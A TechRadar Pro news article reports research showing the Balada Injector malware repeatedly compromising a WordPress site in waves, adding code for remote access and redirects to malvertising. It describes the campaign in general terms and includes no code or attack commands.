One of the most worrying WordPress malware threats is making a comeback
Balada Injector is back, compromising WordPress websites across the internet
When you purchase through links on our site, we may earn an affiliate commission.Here’s how it works.
The Balada Injectormalwareis alive and kicking, and compromising poorly protected WordPress websites across the internet, as well as using them to target visitors, new research has claimed.
Areportfrom researchers at Cybernews claims to have found a compromised WordPress website during a “routine web monitoring operation”.
The compromised website was apparently targeted by the Balada Injector malware - a Linux-based backdoor used to infiltrate websites through common or otherwise known vulnerabilities in WordPress plugins, themes, and similar vulnerabilities. The Balada Injector is known for attacking in “waves” - every month or so, the injector would use a new domain name, and a new code, which it would try to add to the WordPress site’s code.
Waves of attacks
This particular site has had seven different instances of malicious code added and stacked on top of one another. That means that the website suffered seven “waves” of hacking attacks. This code, which was added to the very top of the page and would run before the website loaded, was meant to grant the attackers remote access to infected machines and redirect visitors to different websites with malvertising campaigns running.
WordPress plugin exposes half a million sites to attack>How to build a website for free: A guide to creating a site on a budget>Check out the best firewalls out there
When the researchers deobfuscated and examined some of the PHP payloads found on the compromised website, they discovered URLs of newly spawned Command & Control (C2) endpoints, and subsequent obfuscated JavaScript files, used in the operation scheme. A total of five URLs were found being accessed to load malicious JavaScript onto exploited websites, the researchers said.
The good news for potential victims is that the Balada Injector still isn’t as advanced as it could be. It doesn’t check if compromised websites have had malicious code added before, and because of that, instead of serving the landing page, the website forced the download of a PHP file, which raised red flags with the researchers and, at the end of the day, helped discover the hacking campaign.
Are you a pro? Subscribe to our newsletter
Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!
Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
New fanless cooling technology enhances energy efficiency for AI workloads by achieving a 90% reduction in cooling power consumption
Samsung plans record-breaking 400-layer NAND chip that could be key to breaking 200TB barrier for ultra large capacity AI hyperscaler SSDs
NYT Strands today — hints, answers and spangram for Sunday, November 10 (game #252)
